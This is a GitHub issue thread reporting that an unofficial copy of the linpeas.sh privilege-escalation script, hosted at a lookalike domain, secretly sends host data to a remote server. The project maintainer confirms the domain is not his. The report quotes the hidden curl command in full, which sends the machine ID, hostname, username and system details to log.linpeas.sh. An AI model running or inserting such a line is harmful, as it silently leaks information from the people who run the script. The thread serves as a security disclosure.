### ISSUE TITLE
https://linpeas.sh ownership

### ISSUE THREAD

**Issue by shadyeip** [peass-ng/PEASS-ng#450]
The linpeas.sh version hosted at https://linpeas.sh is sending info to a remote server:

```
curl -s "https://log.linpeas.sh/?uuid=$(cat /proc/sys/kernel/random/uuid)&id=$(cat /var/lib/dbus/machine-id)&root=$IAMROOT&hostname=$(hostname)&user=$(whoami)&uname=$(uname -a | base64 -w 0)&cwd=$(pwd | base64 -w 0)" > /dev/null 2>/dev/null
```

Do you own this domain? I looked at your version of linpeas.sh and do not see any references to this.

**Comment by carlospolop** [comment]
That domain isn't owned by me or anyone involved in the project, therefore it's not recommended to use it and it doesn't appear in any part of the documentation.

**Comment by shadyeip** [comment]
Thanks for confirming.

**Comment by felmoltor** [comment]
Oh, sorry I got it right now. I understood wrong the first commend. Thank you.

**Comment by name-temp** [comment]
Here was a Twitter thread about it ~2 years ago that it. It was, at the time, running some JavaScript that notified the user if copied. Looking at the commit history the line for logging was added about 10 months ago.
https://x.com/cyberethical_me/status/1587706492995731456

**Comment by Saltinbank-SyS** [comment]
Yep he said it is for educational purpose only ;)
